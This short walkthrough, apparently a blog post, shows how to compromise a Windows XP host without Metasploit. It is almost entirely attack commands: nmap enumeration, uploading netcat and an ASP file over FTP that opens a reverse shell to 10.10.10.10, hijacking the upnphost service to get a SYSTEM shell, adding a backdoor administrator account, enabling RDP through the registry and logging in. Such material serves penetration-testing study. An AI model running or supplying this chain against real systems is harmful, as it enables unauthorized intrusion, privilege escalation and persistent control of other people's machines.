Hacking like it’s 1999 (No Metasploit — Windows XP)

Enum & PWN

nmap -sC -sV -oN nmap <TARGET>

Turns out we can write to the webroot, what do we do next?

ftp> put nc.exe
ftp> put callhome.asp

callhome.asp

objshell.Run(“C:\www\nc.exe 10.10.10.10 6000 -e cmd”)

The line above will use the netcat we uploaded via ftp and will use it to call home. Just visit https://vulnerable.net/callhome.asp.

We Now Haz Shell

Now what? The Classics…

FuzzySecurity | Windows Privilege Escalation Fundamentals
Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are…www.fuzzysecurity.com

In this case, by reconfiguring the service we can let it run any binary of our choosing with SYSTEM level privileges.

In this case, I configure it to just call home again so I could manually enable RDP and create an admin user.

sc config upnphost binpath= “C:\www\nc.exe 10.10.10.10 6000 -e C:\WINDOWS\System32\cmd.exe”
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

Enable RDP and Add User

net users hacker hacked /add
net localgroup administrators hacker /add
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Profit and Win like it’s 1999

rdesktop -u hacker -p hacked <TARGET> -g 90%